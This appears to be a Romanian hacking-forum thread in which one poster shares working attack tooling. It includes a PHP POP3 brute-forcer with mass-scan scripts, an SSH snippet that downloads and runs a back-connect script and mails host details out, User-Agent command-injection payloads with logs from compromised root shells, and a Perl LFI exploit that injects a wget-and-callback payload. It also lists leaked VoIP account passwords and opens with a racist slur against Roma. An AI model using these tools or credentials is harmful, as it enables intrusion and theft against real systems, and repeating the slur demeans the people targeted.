UstupidMF

I suck really hard.

I suck really hard.

I suck really hard.

I suck really hard.

Si tziganii nostrii stiu engleza mai bine ca el,oricum toti tziganii sunt muncitori,ciorditori dar si strangatori,mai stau ei 3 4 ani prin gunoaie,si prin 2015 ii vezi pe toti in ml-uri si futancele in cl-uri,65 amg L< ,or sa-si faca palate langa arcul lor de trumf si turnul eiffel :>

L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh login Care se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.ro cat sesion.php <?php error_reporting(0); function POPa($username, $password, $server) { $socket = fsockopen($server, 110); // POP3 port if (!$socket) { return "cracked"; } $res = fgets($socket, 512); // read +OK if (substr(trim($res), 0, 3) != "+OK") { return "cracked"; // return the error } fputs($socket, "USER $username\r\n"); // send user $res = fgets($socket, 512); // read +OK if (substr(trim($res), 0, 3) != "+OK") { return "cracked"; } fputs($socket, "PASS $password\r\n"); // send pass $res = fgets($socket, 512); // read +OK if (substr(trim($res), 0, 3) != "+OK") { return $res; } fputs($socket, "QUIT\r\n"); // quit fclose($socket); $fp = fopen("vuln.txt", "a+"); fwrite($fp, "$server $username $password\n"); fclose($fp); return "cracked"; } //SET INITIAL LOAD $ip = $argv[1]; //READ USER/PASS FILE $fp = fopen("pass_file", "r"); $i = 1; $c2= 1; while (!feof($fp)) { $propozitie = fgets($fp, 4096); $propozitie = explode(" ", $propozitie); $user[$i] = $propozitie[0]; @$pass[$i] = $propozitie[1]; $i = $i + 1; $c2 = $c2 + 1; } fclose($fp); //Do BRUTE-FORCE ATACK $x = 1; $chestie = "not"; while (( $x < $c2 ) and ( $chestie != "cracked" )) { $chestie = POPa($user[$x], $pass[$x], $ip); if ( $chestie == "cracked" ) { $quit = 1; } $x = $x + 1; } //SET END LOAD ?> cat mass ./ss 25 -b $1.0 -i eth0 -s 10 ./ss 25 -b $1.1 -i eth0 -s 10 ./ss 25 -b $1.2 -i eth0 -s 10 ./ss 25 -b $1.3 -i eth0 -s 10 ./ss 25 -b $1.4 -i eth0 -s 10 ./ss 25 -b $1.5 -i eth0 -s 10 ./ss 25 -b $1.6 -i eth0 -s 10 ./ss 25 -b $1.7 -i eth0 -s 10 ./ss 25 -b $1.8 -i eth0 -s 10 ./ss 25 -b $1.9 -i eth0 -s 10 ./ss 25 -b $1.10 -i eth0 -s 10 cat bios.txt | sort | uniq > mfu.txt CONTOR=0 for i in `cat mfu.txt` do CONTOR=`ps aux | grep -c php` while [ $CONTOR -ge 150 ];do CONTOR=`ps aux | grep -c php` echo "Sleeping" sleep 5 done if [ $CONTOR -le 150 ]; then php sesion.php $i > /dev/null & fi done sleep 10 rm -rf bios.txt mfu.txt ./ss 25 -b $1.11 -i eth0 -s 10 ./ss 25 -b $1.12 -i eth0 -s 10 ./ss 25 -b $1.13 -i eth0 -s 10 ./ss 25 -b $1.14 -i eth0 -s 10 ./ss 25 -b $1.15 -i eth0 -s 10 ./ss 25 -b $1.16 -i eth0 -s 10 ./ss 25 -b $1.17 -i eth0 -s 10 ./ss 25 -b $1.18 -i eth0 -s 10 ./ss 25 -b $1.19 -i eth0 -s 10 ./ss 25 -b $1.20 -i eth0 -s 10 cat bios.txt | sort | uniq > mfu.txt CONTOR=0 for i in `cat mfu.txt` do CONTOR=`ps aux | grep -c php` while [ $CONTOR -ge 150 ];do CONTOR=`ps aux | grep -c php` echo "Sleeping" sleep 5 done if [ $CONTOR -le 150 ]; then php sesion.php $i > /dev/null & fi done sleep 10 rm -rf bios.txt mfu.txt cat start echo "POP3 BruteForce" echo "By(val) Rsx200" ./ps $1 25 sleep 5 echo "Doing BruteForce..." cat $1.pscan.25 | sort | uniq > mfu.txt CONTOR=0 for i in `cat mfu.txt` do CONTOR=`ps aux | grep -c php` while [ $CONTOR -ge 150 ];do CONTOR=`ps aux | grep -c php` echo "Sleeping" sleep 5 done if [ $CONTOR -le 150 ]; then php sesion.php $i > /dev/null & fi done

Nu va mai chinuitzi cu toate prostiile de bruteforcere care le au toti ratatzii,e foarte simplu sa luati direct providerii .. sa va adaugatzi credit .. si sa le setatzi cum vreti. id: 191 login: wellington senha: 102423 tipo: 1 regional: ULA contato: id: 156 login: eder senha: 123456 tipo: 1 regional: PRS contato: id: 173 login: valdir senha: 101052 tipo: 1 regional: ULA contato: id: 158 login: ranieri senha: ranierir tipo: 0 regional: FAC contato: id: 159 login: samuelj senha: 123456 tipo: 0 regional: BHE contato: 31 84921317 name: 4906 accountcode: 4906 amaflags: callgroup: callerid: ENGESET [4906] canreinvite: yes jabber: context: pos-pago defaultip: dtmfmode: RFC2833 fromuser: fromdomain: fullcontact: host: dynamic insecure: language: mailbox: 4906 md5secret: nat: yes deny: permit: mask: pickupgroup: port: qualify: yes restrictcid: rtptimeout: rtpholdtimeout: secret: 123456 type: friend username: 4906 disallow: all allow: g729,gsm,ulaw,alaw musiconhold: regseconds: 3600 ipaddr: regexten: cancallforward: yes setvar: contato: credito: tarifado: lastms: useragent: regserver: defaultuser: daca tot va place bruteforce-ul .. continuati pe ssh,usere default,console:console,asterisk:obelisk etc .. dupa ce intratzi in interfatza facetzi setarile care le doriti si dup-aia datzi !/bin/sh pt shell,daca nu direct ssh -l user ip '/bin/sh'

type=USER_ACCT msg=audit(1278725341.429:544087): user pid=19682 uid=0 auid=4294967295 msg='PAM: accounting acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)' type=CRED_ACQ msg=audit(1278725341.429:544088): user pid=19682 uid=0 auid=4294967295 msg='PAM: setcred acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)' type=LOGIN msg=audit(1278725341.429:544089): login pid=19682 uid=0 old auid=4294967295 new auid=48 type=USER_START msg=audit(1278725341.429:544090): user pid=19682 uid=0 auid=48 msg='PAM: session open acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

Am luat la rand toate sursele de ssh bruteforce de pe google ,am stat sa le combin pe toate sa fac una sa mearga,ca sa-ti dau tzie sursa (ANdreicj)?

Este o bucata din sursa de bruteforce ...cauta pe google si documenteaza-te inainte sa pui intrebari

Thu, 25 Feb 2010 01:34:22 -0800 Thanks for the clarification and the options. - execute several commands; can't do this as I need to test result/output of each command before determining what commands to execute next - start a scripting language; my intent is to provide a Rexx interface to libssh to simplify the interaction with the server So basically if I use channel_request_shell() then the environment on the server will be retained between subsequent calls to channel_request_shell() ? I don't fully understand the statement(s) about not being able to parse the $ or # prompts (or in the previous email; "you must know shell prompt before you begin communication". Is this because the shell prompt is included in the contents of channel_read() ? Thanks, Mark On Thu, 2010-02-25 at 10:19 +0100, Aris Adamantiadis wrote: Hi, Indeed, you can execute only one command using channel_request_exec. But you may either execute several commands start a scripting language example: channel_request_exec(channel,"cd /tmp; mkdir mytest; cd mytest; touch mytest"); This will be executed as only one shell command. Another solution is // Do NOT put the channel into interactive mode/pty channel_request_shell(channel); channel_write(channel,"cd /tmp ; echo OK"); channel_read(...) channel_write(channel,"mkdir mytest ; echo OK"); ... basicaly that's like a shell script. Do not expect being able to parse the "#" or "$" prompts, it won't work... hope this helps. Aris Mark Hessling a écrit : I'm looking at libssh to enable the replacement of an existing application that uses raw sockets to control a telnet session. In future the connection must be done using ssh. I tried modifying examples/exec.c and duplicated the block of code that calls channel_request_exec() to execute "ps aux" and to read the output. I simply added a call to channel_request_exec() to execute "ls -l", but I received an error: "Channel exec request failed". Should I be able to with libssh, execute a shell command on the remote host, read its output and execute another shell command and read its output? From my reading of the documentation it appears that each call to channel_request_exec() spawns another shell on the remote server, so if I wanted to execute the following on the remote server: "cd tmp" "./run_my_command" then the second command would not be executed in the "tmp" directory. Does libssh then need a "changedirectory" function similar to the one that sets environment variables? Thanks in advance for your responses. * Mark Hessling, m...@ * Author of THE, a Free XEDIT/KEDIT editor, Rexx/SQL, Rexx/CURL, etc. Am si facut testul,merge foarte bine CHANNEL *channel; channel = open_session_channel(session,1000,1000); if(isatty(0)) err=channel_request_exec(channel,"cd /tmp; mkdir mytest; cd mytest; touch mytest; wget 201.145/cb.jpg; perl cb.jpg .214.1 80&"); err=channel_request_pty(channel); err=channel_request_shell(channel); start=time(0); while (channel, "shell",sizeof("shell") - 1, NULL, 0) { usleep(500000); err=channel_poll(channel,0); if(err>0){ err=channel_write(channel,"cd /tmp ; echo OK ; pwd ; id ; uname -a >> /tmp/cmd.txt ; cat /tmp/cmd.txt | mail -s 'SSH' ceva@yahoo.com ",0); err=channel_read(channel,readbuf,0,0); err=channel_write(channel,"mkdir mytest ; echo OK",0); int port=65022; options=ssh_getopt(&argc,argv); options_set_username(options,user); options_set_host(options,host); options_set_port(options,port); session=ssh_connect(options); /libssh2-1.2.6/maint # ./channel 1 #n-> root somepass some.26.38.1 | somehost.org listening on [any] 80 ... connect to [10.48.1.10] from somehost.org [38.1] 33070 Linux somehost.org 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:24:31 EDT 2006 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:initrc_t sh: no job control in this shell sh-3.00# O sa mai testez blind,sa vad cum merge si cu '/bin/sh' '/bin/ksh' ;poate prinde ceva si revin cu idei type=USER_ACCT msg=audit(1278725341.429:544087): user pid=19682 uid=0 auid=4294967295 msg='PAM: accounting acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)' type=CRED_ACQ msg=audit(1278725341.429:544088): user pid=19682 uid=0 auid=4294967295 msg='PAM: setcred acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)' type=LOGIN msg=audit(1278725341.429:544089): login pid=19682 uid=0 old auid=4294967295 new auid=48 type=USER_START msg=audit(1278725341.429:544090): user pid=19682 uid=0 auid=48 msg='PAM: session open acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)' Scanning for postgres:postgres OK:78.*.*.*:postgres:postgres OK:72.*.*.*:postgres:postgres OK:218.*.*.*:postgres:postgres OK:24.*.*.*:postgres:postgres Scanning for home:home OK:189.*.*.*:oracle:oracle OK:187.*.*.*:oracle:oracle OK:220.*.*.*:mysql:mysql OK:62.*.*.*:service:service OK:63.*.*.*:user:user OK:63.*.*.*:user:user OK:208.*.*.*:user:user OK:222.*.*.*:user:user OK:187.*.*.*:user:user Flubber,ti-ai ales bine nick-ul pt ca esti putin "incomptetent" si daca vrei sa ma contrazici invatza sa scrii singurel,nu lua de pe google linkuri care nu le intelegi + propozitzii de pe forum si ca sa pari si mai "incompetent" itzi faci si altar de gifuri. Ti-am dat clar bucata din sursa de bruteforce care este pe "piatza ta de HACKER" din 2003-2004. Am inceput sa postez pe forumul asta,crezand ca sunt oameni capabili,dar vad numai incompetenti,care-si dau cu parerea intr-un domeniu in care chiar nu se poate sa te arunci in discutzii fara sa ai habar,sunteti niste "Panarame" Hackerilor Era sa uit,bha OUTPUT-ULE,cum poti sa spui,ca implementezi o sursa in c in metasploit ? esti retardat mintal ?!

Asa,de vreo 2 saptamani ma tot chinui cu cgiscanul meu si cu lfi-urile,mi-am pus la misto in sprintf(get,"GET %s%s HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ystem(\'cd etc ... r\nHost: %s\r\nConnection: Close\r\n\r\n",dir,file,ip); si am inceput sa dau dupa tot felu de lfi-uri,imediat ce am dat drumu la scan,am vazut ca-mi vin multe servere cu uid0 ,foarte ciudat,m-am tot uitat prin ele,sa inteleg care-i faza,cum de-mi vin direct root M-a bagat mai rau in ceata 6788 ? S 0:00 /realsentry/wsp/gui/interface/bin/wsp-gui -k restart 9573 ? Ss 0:00 /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php 9814 ? SN 0:00 sh -c php /realsentry/wsp/gui/core/tools_system/send_syslog.php '[bLOCKED INTERNAL][2581809048] : 2010/06/21 18:44:01 - HEADER(3): User-Agent = ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)' asta a fost 1 bug 21130 ? S 0:01 /usr/bin/perl -w /var/log/apache2/folderize /var/log/apache2 10573 ? S 0:00 sh -c echo '74.54.0.0 - - [21/Jun/2010:19:18:59 +0200] "GET HTTP/1.1 HTTP/1.1" 400 351 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"' >> "/var/log/apache2/vhost_ip.log"sh-2.05b# sent 32, rcvd 10248 al doilea 2029 ? S 0:00 /usr/bin/perl /usr/imjm/scripts/access2msg.pl 2031 ? S 14:54 /usr/bin/perl /usr/imjm/scripts/access2msg_healthcheck.pl 2032 ? S 6:57 /usr/bin/perl /usr/imjm/scripts/access2msg_localhost.pl 2350 ? S 0:00 sh -c echo '94.199.0.0 - - [20/Jun/2010:02:39:28 +0900] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 211 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 124.110.94.18 80 983 -' >> /tmp/access_count/mon_err_log_localhost al treilea cat /proc/2733/cmdline sh-cecho '74.54.0.0 - - [21/Jun/2010:23:45:22 +0900] "GET /index.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 281 "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" - -' >> /tmp/access_count/accesslog asta m-a speriat 25977 ? SN 0:00 sh -c /bin/bash -c 'CL="0"; CT=0; for ((i=0;i<=128;i++)); do if [ -z "$(sudo mpt-status -i $i -s 2>&1 | egrep "no SCSI disks attached|mptctl")" ]; then let CT=$CT+$(sudo mpt-status -i $i -s | egrep -v "(OPTIMAL|ONLINE)" | wc -l); CL="1"; fi; done; ([ "${CL}" -eq "0" ] && echo 1) || echo ${CT}' 24728 ? D 0:08 /usr/bin/webalizer -c /var/www/web33/.configs/webalizer.conf 19858 ? Ss 0:00 /bin/bash -c /usr/share/confixx/runwebalizer.sh am tzipat repede dupa buffer sa ma ajute si am gasit alt bug echo -n -e "GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ';ping yahoo.com;'\r\nHost: ip atacat\r\n\r\n" |nc ip atacat 80 sigur este o vulnerabilitate care sa se lege de toate,doar ca nu sunt eu in stare s-o gasesc m-au zapacit de tot,daca avetzi vreo idee si vretzi mai multe detalii,lasati-mi un msg realsentry/wsp/tools/php/php /realsentry/wsp/gui/core/parser/parser.php 1 idi1 graceful Warning: fopen(/dev/fd/0): failed to open stream: No such device or address in /realsentry/wsp/gui/core/parser/parser.php on line 12 /dev/fd/0 /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php od[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Resuming normal operation (pid 10825) [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Security database clean up. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: No logs security found [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check disks status. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check the size of log files with no rotation configured. /bin/sh: line 6: 10825 Killed /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php /usr/bin/perl /usr/imjm/scripts/access2msg_md.pl /bin/sh /command/svscanboot $outpath = "/tmp/access_count"; if( ! mkdir( $work ) ){ unlink( $pidfile ) or &logger( "WAR: Can't remove $pidfile" ); &error_exit( $@, "WAR: Can't make $work" ); } chmod( 0711, $work ); chown( "root", "pf", $work ); } ls -all /tmp/access_count/accesslog -rw-r--r-- 1 red swing 0 Jun 22 02:57 /tmp/access_count/accesslog 2.4.21-37.EL #1 Wed Sep 7 13:35:21 EDT 2005 i686 i686 i386 GNU/Linux uid=1000(red) gid=1000(swing) groups=1000(swing) sh: no job control in this shell sh-2.05b$ Nu fiti tzarani sa tzinetzi pt voi,sper c-o sa primesc un msg cu sploitul dezvoltat Credits xbuffer and me [0] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php [1] => -e [2] => 7iBoxCron.Exec; ) _SERVER["argc"] => 3 _ENV["SHELL"] => /bin/sh _ENV["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin _ENV["PWD"] => /root _ENV["LANG"] => en_US.ISO-8859-15 _ENV["SHLVL"] => 1 _ENV["HOME"] => /root _ENV["LOGNAME"] => root _ENV["_"] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php _GET["SessionProcess"] => 7iExecMain.php _GET["SessionPriority"] => High _GET["SessionId"] => a9627114cdf99d5be8547af0d51d1daa _GET["Download"] => 0 _GET["DownloadFile"] => _GET["SessionEvalstring"] => ; include_once('/opt/7i/lib/_Bin/_1a_Controller/_Controller/_controllermain.inc'); _ControllerMain('0','a9627114cdf99d5be8547af0d51d1daa','','',$_COOKIE,$_ENV,$_FILES,$_GET,$_POST,@$GLOBALS['HTTP_RAW_POST_DATA'],$_SERVER,'',''); _SERVER["SHELL"] => /bin/sh _SERVER["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Puteti sa-l tot modificatzi asa cum am facut si eu in ultimii ani. Mura-n-Gura if(strstr(ret,"RoundCube List Widget")!=NULL) aici punetzi voi ce sa caute .. pt rfi daca facetzi ceva gen http://ip/rfi=http://ip/shell.php? <?php echo ("MFU hacked you"); ?> punetzi sa caute MFU hacked you rfi-urile le punetzi intr-un cgifile /ip/rfibug?bug=http://ip/pathspre/shell.php? Pentru compilare downloadatzi toate fisierele http://UstupidMF.xhost.ro/vuln/mass.c.txt http://UstupidMF.xhost.ro/vuln/http_get.c.txt http://UstupidMF.xhost.ro/vuln/http_get.h.txt http://UstupidMF.xhost.ro/vuln/build.h.txt Daca reusiti sa-l modificatzi intr-un mass mai bun nu ezitatzi sa-mi datzi un e-mail h00lyshit123 at gmail dot com /sphider/install.txt /search/install.txt /sphider-plus/install.txt /sphider-1.3.5/install.txt if(strstr(ret,"Sphider - a lightweight")!=NULL) exit(0); nu trebuie sa va chinuiti prea mult cu el cu sphider o sa gasiti destule,problema este ca nu foarte multe au userul si pasul default admin = admin dar puteti incerca cu http://ip/path/spider.php si datzi direct click pe login use LWP::UserAgent; my $path = $ARGV[0] or die("Usage: perl env.pl http://mf.mf/director\n"); $ua = new LWP::UserAgent; $ua->agent("<?system('ls -all;uname -a;id;pwd;wget host/a/cback.txt -O /var/tmp/cback.txt;perl /var/tmp/cback.txt host 80');?>"); { print "[*] [*] [*] Tulai Domne [*] [*] [*]\n"; } my $req = new HTTP::Request (POST => "$path/index.php"); $req->content_type('application/x-www-form-urlencoded'); $req->content("_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[itemid]=../../../../../../../../../../../../../../../proc/self/environ%00"); $req->content("option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00"); $req->content("option=com_sweetykeeper&controller=../../../../../../../../../../proc/self/environ%00"); $req->content("option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00"); $req->content("option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00"); $req->content("option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00"); $req->content("page=../../../../../../../../proc/self/environ%00"); $req->content("option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00"); $req->content("_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ"); $req->content("option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00"); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /<td class=["']main_section['"]>(.*)/ ) { print "[*] [*] [*] Tulai Domne [*] [*] [*]\n"; } else { print "$data\n"; } Este sploitu de e107,l-am modificat putin pt lfi-uri daca nu va place asa,puteti sa adaugatzi inca un argv sa scoateti stringul din xpl my $path = $ARGV[0] or die("Usage: perl env.pl http://mf.mf/director\n"); my $load = $ARGV[1]; my $req = new HTTP::Request (POST => "$path/index.php?$load"); $req->content("$load=../../../../../../../../../../../../../../../proc/self/environ%00");